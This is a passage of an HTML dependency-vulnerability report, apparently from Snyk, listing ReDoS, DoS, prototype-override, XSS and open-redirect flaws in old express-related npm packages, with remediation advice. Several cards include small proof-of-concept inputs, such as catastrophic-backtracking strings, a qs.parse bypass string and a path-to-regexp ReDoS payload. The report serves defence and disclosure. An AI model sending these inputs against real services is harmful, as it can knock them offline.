+</code></pre><p>This regular expression accomplishes the following:</p><ul><li><code>A</code> The string must start with the letter &#39;A&#39;</li><li><code>(B|C+)+</code> The string must then follow the letter A with either the letter &#39;B&#39; or some number of occurrences of the letter &#39;C&#39; (the <code>+</code> matches one or more times). The <code>+</code> at the end of this section states that we can look for one or more matches of this section.</li><li><code>D</code> Finally, we ensure this section of the string ends with a &#39;D&#39;</li></ul><p>The expression would match inputs such as <code>ABBD</code>, <code>ABCCCCD</code>, <code>ABCBCCCD</code> and <code>ACCCCCD</code></p><p>It most cases, it doesn&#39;t take very long for a regex engine to find a match:</p><pre><code>$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD&#34;)&#39;
+0.04s user 0.01s system 95% cpu 0.052 total
+
+$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX&#34;)&#39;
+1.79s user 0.02s system 99% cpu 1.812 total
+</code></pre><p>The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.</p><p>Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.</p><p>Let&#39;s look at how our expression runs into this problem, using a shorter string: &#34;ACCCX&#34;. While it seems fairly straightforward, there are still four different ways that the engine could match those three C&#39;s:</p><ol><li>CCC</li><li>CC+C</li><li>C+CC</li><li>C+C+C.</li></ol><p>The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use <a href="https://regex101.com/debugger" target="_blank" rel="noopener noreferrer">RegEx 101 debugger</a> to see the engine has to take a total of 38 steps before it can determine the string doesn&#39;t match.</p><p>From there, the number of steps the engine must use to validate a string just continues to grow.</p><table><thead><tr><th>String</th><th>Number of C&#39;s</th><th>Number of steps</th></tr></thead><tbody><tr><td>ACCCX</td><td>3</td><td>38</td></tr><tr><td>ACCCCX</td><td>4</td><td>71</td></tr><tr><td>ACCCCCX</td><td>5</td><td>136</td></tr><tr><td>ACCCCCCCCCCCCCCX</td><td>14</td><td>65,553</td></tr></tbody></table><p>By the time the string includes 14 C&#39;s, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.</p><h2>Remediation</h2><p>Upgrade <code>fresh</code> to version 0.5.2 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/jshttp/fresh/commit/21a0f0c2a5f447e0d40bc16be0c23fa98a7b46ec" target="_blank" rel="noopener noreferrer">https://github.com/jshttp/fresh/commit/21a0f0c2a5f447e0d40bc16be0c23fa98a7b46ec</a></li><li><a href="https://github.com/jshttp/fresh/issues/24" target="_blank" rel="noopener noreferrer">https://github.com/jshttp/fresh/issues/24</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/npm:fresh:20170908" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">101</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Regular Expression Denial of Service (ReDoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">npm:negotiator:20160616</li>
+      <li class="card-meta-item">CWE-400</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> negotiator@0.3.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; accepts@1.0.0 &#x203A; negotiator@0.3.0</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://npmjs.org/package/negotiator" target="_blank" rel="noopener noreferrer">negotiator</a> is an HTTP content negotiator for Node.js.</p><p>Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS)</p><p>when parsing <code>Accept-Language</code> http header.</p><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.</p><p>The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren&#39;t very intuitive and can ultimately end up making it easy for attackers to take your site down.</p><p>Let’s take the following regular expression as an example:</p><pre><code>regex = /A(B|C+)+D/
+</code></pre><p>This regular expression accomplishes the following:</p><ul><li><code>A</code> The string must start with the letter &#39;A&#39;</li><li><code>(B|C+)+</code> The string must then follow the letter A with either the letter &#39;B&#39; or some number of occurrences of the letter &#39;C&#39; (the <code>+</code> matches one or more times). The <code>+</code> at the end of this section states that we can look for one or more matches of this section.</li><li><code>D</code> Finally, we ensure this section of the string ends with a &#39;D&#39;</li></ul><p>The expression would match inputs such as <code>ABBD</code>, <code>ABCCCCD</code>, <code>ABCBCCCD</code> and <code>ACCCCCD</code></p><p>It most cases, it doesn&#39;t take very long for a regex engine to find a match:</p><pre><code>$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD&#34;)&#39;
+0.04s user 0.01s system 95% cpu 0.052 total
+
+$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX&#34;)&#39;
+1.79s user 0.02s system 99% cpu 1.812 total
+</code></pre><p>The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.</p><p>Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.</p><p>Let&#39;s look at how our expression runs into this problem, using a shorter string: &#34;ACCCX&#34;. While it seems fairly straightforward, there are still four different ways that the engine could match those three C&#39;s:</p><ol><li>CCC</li><li>CC+C</li><li>C+CC</li><li>C+C+C.</li></ol><p>The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use <a href="https://regex101.com/debugger" target="_blank" rel="noopener noreferrer">RegEx 101 debugger</a> to see the engine has to take a total of 38 steps before it can determine the string doesn&#39;t match.</p><p>From there, the number of steps the engine must use to validate a string just continues to grow.</p><table><thead><tr><th>String</th><th>Number of C&#39;s</th><th>Number of steps</th></tr></thead><tbody><tr><td>ACCCX</td><td>3</td><td>38</td></tr><tr><td>ACCCCX</td><td>4</td><td>71</td></tr><tr><td>ACCCCCX</td><td>5</td><td>136</td></tr><tr><td>ACCCCCCCCCCCCCCX</td><td>14</td><td>65,553</td></tr></tbody></table><p>By the time the string includes 14 C&#39;s, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.</p><h2>Remediation</h2><p>Upgrade <code>negotiator</code> to version 0.6.1 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/jshttp/negotiator/commit/26a05ec15cf7d1fa56000d66ebe9c9a1a62cb75c" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul><ul><li><a href="https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS" target="_blank" rel="noopener noreferrer">OWASP Advisory</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/npm:negotiator:20160616" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">105</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Denial of Service (DoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">npm:qs:20140806</li>
+      <li class="card-meta-item">CWE-400</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> qs@0.6.6</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; qs@0.6.6</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.npmjs.com/package/qs" target="_blank" rel="noopener noreferrer">qs</a> is a querystring parser that supports nesting and arrays, with a depth limit.</p><p>Affected versions of this package are vulnerable to Denial of Service (DoS).</p><p>During parsing, the <code>qs</code> module may create a sparse area (an array where no elements are filled), and grow that array to the necessary size based on the indices used on it. An attacker can specify a high index value in a query string, thus making the server allocate a respectively big array. Truly large values can cause the server to run out of memory and cause it to crash - thus enabling a Denial-of-Service attack.</p><h2>Remediation</h2><p>Upgrade <code>qs</code> to version 1.0.0 or higher.</p><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.</p><p>Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.</p><p>One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.</p><p>When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.</p><p>Two common types of DoS vulnerabilities:</p><ul><li>High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, <a href="SNYK-JAVA-COMMONSFILEUPLOAD-30082" target="_blank" rel="noopener noreferrer">commons-fileupload:commons-fileupload</a>.</li></ul><ul><li>Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  <a href="npm:ws:20171108" target="_blank" rel="noopener noreferrer">npm <code>ws</code> package</a></li></ul><h2>References</h2><ul><li><a href="https://github.com/tj/node-querystring/pull/114/commits/43a604b7847e56bba49d0ce3e222fe89569354d8" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul><ul><li><a href="https://github.com/visionmedia/node-querystring/issues/104" target="_blank" rel="noopener noreferrer">GitHub Issue</a></li></ul><ul><li><a href="https://nvd.nist.gov/vuln/detail/CVE-2014-7191" target="_blank" rel="noopener noreferrer">NVD</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/npm:qs:20140806" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">101</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Prototype Override Protection Bypass</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">npm:qs:20170213</li>
+      <li class="card-meta-item">CWE-20</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> qs@0.6.6</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; qs@0.6.6</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.npmjs.com/package/qs" target="_blank" rel="noopener noreferrer">qs</a> is a querystring parser that supports nesting and arrays, with a depth limit.</p><p>Affected versions of this package are vulnerable to Prototype Override Protection Bypass. By default <code>qs</code> protects against attacks that attempt to overwrite an object&#39;s existing prototype properties, such as <code>toString()</code>, <code>hasOwnProperty()</code>,etc.</p><p>From <a href="https://github.com/ljharb/qs" target="_blank" rel="noopener noreferrer"><code>qs</code> documentation</a>:</p><p>&gt; By default parameters that would overwrite properties on the object prototype are ignored, if you wish to keep the data from those fields either use plainObjects as mentioned above, or set allowPrototypes to true which will allow user input to overwrite those properties. WARNING It is generally a bad idea to enable this option as it can cause problems when attempting to use the properties that have been overwritten. Always be careful with this option.</p><p>Overwriting these properties can impact application logic, potentially allowing attackers to work around security controls, modify data, make the application unstable and more.</p><p>In versions of the package affected by this vulnerability, it is possible to circumvent this protection and overwrite prototype properties and functions by prefixing the name of the parameter with <code>[</code> or <code>]</code>. e.g. <code>qs.parse(&#34;]=toString&#34;)</code> will return <code>{toString = true}</code>, as a result, calling <code>toString()</code> on the object will throw an exception.</p><p><strong>Example:</strong></p><pre><code>qs.parse(&#39;toString=foo&#39;, { allowPrototypes: false })
+// {}
+
+qs.parse(&#34;]=toString&#34;, { allowPrototypes: false })
+// {toString = true} &lt;== prototype overwritten
+</code></pre><p>For more information, you can check out our <a href="https://snyk.io/blog/high-severity-vulnerability-qs/" target="_blank" rel="noopener noreferrer">blog</a>.</p><h2>Disclosure Timeline</h2><ul><li>February 13th, 2017 - Reported the issue to package owner.</li><li>February 13th, 2017 - Issue acknowledged by package owner.</li><li>February 16th, 2017 - Partial fix released in versions <code>6.0.3</code>, <code>6.1.1</code>, <code>6.2.2</code>, <code>6.3.1</code>.</li><li>March 6th, 2017     - Final fix released in versions <code>6.4.0</code>,<code>6.3.2</code>, <code>6.2.3</code>, <code>6.1.2</code> and <code>6.0.4</code></li></ul><h2>Remediation</h2><p>Upgrade <code>qs</code> to version 6.0.4, 6.1.2, 6.2.3, 6.3.2 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/ljharb/qs/commit/beade029171b8cef9cee0d03ebe577e2dd84976d" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/ljharb/qs/issues/200" target="_blank" rel="noopener noreferrer">GitHub Issue</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/npm:qs:20170213" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">34</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Cross-site Scripting (XSS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-COOKIE-8163060</li>
+      <li class="card-meta-item">CWE-79</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> cookie@0.1.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; cookie@0.1.0</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p>Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the cookie <code>name</code>, <code>path</code>, or <code>domain</code>, which can be used to set unexpected values to other cookie fields.</p><h2>Workaround</h2><p>Users who are not able to upgrade to the fixed version should avoid passing untrusted or arbitrary values for the cookie fields and ensure they are set by the application instead of user input.</p><h2>Details</h2><p>Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.</p><p>This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML)  in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.</p><p>Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.</p><p>Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, <code>&lt;</code> can be coded as  <code>&amp;lt</code>; and <code>&gt;</code> can be coded as <code>&amp;gt</code>; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses <code>&lt;</code> and <code>&gt;</code> as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.</p><p>The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.</p><h3>Types of attacks</h3><p>There are a few methods by which XSS can be manipulated:</p><table><thead><tr><th>Type</th><th>Origin</th><th>Description</th></tr></thead><tbody><tr><td><strong>Stored</strong></td><td>Server</td><td>The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.</td></tr><tr><td><strong>Reflected</strong></td><td>Server</td><td>The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.</td></tr><tr><td><strong>DOM-based</strong></td><td>Client</td><td>The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.</td></tr><tr><td><strong>Mutated</strong></td><td></td><td>The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.</td></tr></tbody></table><h3>Affected environments</h3><p>The following environments are susceptible to an XSS attack:</p><ul><li>Web servers</li><li>Application servers</li><li>Web application environments</li></ul><h3>How to prevent</h3><p>This section describes the top best practices designed to specifically protect your code:</p><ul><li>Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.</li><li>Convert special characters such as <code>?</code>, <code>&amp;</code>, <code>/</code>, <code>&lt;</code>, <code>&gt;</code> and spaces to their respective HTML or URL encoded equivalents.</li><li>Give users the option to disable client-side scripts.</li><li>Redirect invalid requests.</li><li>Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.</li><li>Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.</li><li>Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.</li></ul><h2>Remediation</h2><p>Upgrade <code>cookie</code> to version 0.7.0 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/jshttp/cookie/commit/e10042845354fea83bd8f34af72475eed1dadf5c" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/jshttp/cookie/pull/167" target="_blank" rel="noopener noreferrer">GitHub PR</a></li><li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2316549" target="_blank" rel="noopener noreferrer">Red Hat Bugzilla Bug</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-COOKIE-8163060" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">74</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Open Redirect</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-EXPRESS-6474509</li>
+      <li class="card-meta-item">CWE-601</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> express@4.0.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://github.com/expressjs/express" target="_blank" rel="noopener noreferrer">express</a> is a minimalist web framework.</p><p>Affected versions of this package are vulnerable to Open Redirect due to the implementation of URL encoding using <code>encodeurl</code> before passing it to the <code>location</code> header. This can lead to unexpected evaluations of malformed URLs by common redirect allow list implementations in applications, allowing an attacker to bypass a properly implemented allow list and redirect users to malicious sites.</p><h2>Remediation</h2><p>Upgrade <code>express</code> to version 4.19.2, 5.0.0-beta.3 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/expressjs/express/commit/0b746953c4bd8e377123527db11f9cd866e39f94" target="_blank" rel="noopener noreferrer">Github Commit</a></li><li><a href="https://github.com/expressjs/express/commit/0867302ddbde0e9463d0564fea5861feb708c2dd" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/koajs/koa/issues/1800" target="_blank" rel="noopener noreferrer">Github Issue</a></li><li><a href="https://github.com/expressjs/express/pull/5551" target="_blank" rel="noopener noreferrer">GitHub PR</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-EXPRESS-6474509" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">75</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Cross-site Scripting</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-EXPRESS-7926867</li>
+      <li class="card-meta-item">CWE-79</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> express@4.0.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://github.com/expressjs/express" target="_blank" rel="noopener noreferrer">express</a> is a minimalist web framework.</p><p>Affected versions of this package are vulnerable to Cross-site Scripting due to improper handling of user input in the <code>response.redirect</code> method. An attacker can execute arbitrary code by passing malicious input to this method.</p><p><strong>Note</strong></p><p>To exploit this vulnerability, the following conditions are required:</p><p>1) The attacker should be able to control the input to <code>response.redirect()</code></p><p>2) express must not redirect before the template appears</p><p>3) the browser must not complete redirection before:</p><p>4) the user must click on the link in the template</p><h2>Remediation</h2><p>Upgrade <code>express</code> to version 4.20.0, 5.0.0 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-EXPRESS-7926867" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">57</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Regular Expression Denial of Service (ReDoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-PATHTOREGEXP-7925106</li>
+      <li class="card-meta-item">CWE-1333</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> path-to-regexp@0.1.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; path-to-regexp@0.1.2</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p>Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) when including multiple regular expression parameters in a single segment, which will produce the regular expression <code>/^\/([^\/]+?)-([^\/]+?)\/?$/</code>, if two parameters within a single segment are separated by a character other than a <code>/</code> or <code>.</code>. Poor performance will block the event loop and can lead to a DoS.</p><p><strong>Note:</strong></p><p>While the 8.0.0 release has completely eliminated the vulnerable functionality, prior versions that have received the patch to mitigate backtracking may still be vulnerable if custom regular expressions are used. So it is strongly recommended for regular expression input to be controlled to avoid malicious performance degradation in those versions. This behavior is enforced as of version 7.1.0 via the <code>strict</code> option, which returns an error if a dangerous regular expression is detected.</p><h2>Workaround</h2><p>This vulnerability can be avoided by using a custom regular expression for parameters after the first in a segment, which excludes <code>-</code> and <code>/</code>.</p><h2>PoC</h2><pre><code>/a${&#39;-a&#39;.repeat(8_000)}/a
+</code></pre><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.</p><p>The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren&#39;t very intuitive and can ultimately end up making it easy for attackers to take your site down.</p><p>Let’s take the following regular expression as an example:</p><pre><code>regex = /A(B|C+)+D/
+</code></pre><p>This regular expression accomplishes the following:</p><ul><li><code>A</code> The string must start with the letter &#39;A&#39;</li><li><code>(B|C+)+</code> The string must then follow the letter A with either the letter &#39;B&#39; or some number of occurrences of the letter &#39;C&#39; (the <code>+</code> matches one or more times). The <code>+</code> at the end of this section states that we can look for one or more matches of this section.</li><li><code>D</code> Finally, we ensure this section of the string ends with a &#39;D&#39;</li></ul><p>The expression would match inputs such as <code>ABBD</code>, <code>ABCCCCD</code>, <code>ABCBCCCD</code> and <code>ACCCCCD</code></p><p>It most cases, it doesn&#39;t take very long for a regex engine to find a match:</p><pre><code>$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD&#34;)&#39;
+0.04s user 0.01s system 95% cpu 0.052 total
+
+$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX&#34;)&#39;
+1.79s user 0.02s system 99% cpu 1.812 total
+</code></pre><p>The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.</p><p>Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.</p><p>Let&#39;s look at how our expression runs into this problem, using a shorter string: &#34;ACCCX&#34;. While it seems fairly straightforward, there are still four different ways that the engine could match those three C&#39;s:</p><ol><li>CCC</li><li>CC+C</li><li>C+CC</li><li>C+C+C.</li></ol><p>The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use <a href="https://regex101.com/debugger" target="_blank" rel="noopener noreferrer">RegEx 101 debugger</a> to see the engine has to take a total of 38 steps before it can determine the string doesn&#39;t match.</p><p>From there, the number of steps the engine must use to validate a string just continues to grow.</p><table><thead><tr><th>String</th><th>Number of C&#39;s</th><th>Number of steps</th></tr></thead><tbody><tr><td>ACCCX</td><td>3</td><td>38</td></tr><tr><td>ACCCCX</td><td>4</td><td>71</td></tr><tr><td>ACCCCCX</td><td>5</td><td>136</td></tr><tr><td>ACCCCCCCCCCCCCCX</td><td>14</td><td>65,553</td></tr></tbody></table><p>By the time the string includes 14 C&#39;s, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.</p><h2>Remediation</h2><p>Upgrade <code>path-to-regexp</code> to version 0.1.10, 1.9.0, 3.3.0, 6.3.0, 8.0.0 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li>[GitHub Commit](https://github.com/p</li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-PATHTOREGEXP-7925106" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">61</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Regular Expression Denial of Service (ReDoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-PATHTOREGEXP-8482416</li>
+      <li class="card-meta-item">CWE-1333</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> path-to-regexp@0.1.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tsc@1.0.0 &#x203A; express@4.0.0 &#x203A; path-to-regexp@0.1.2</div>
+    </div>
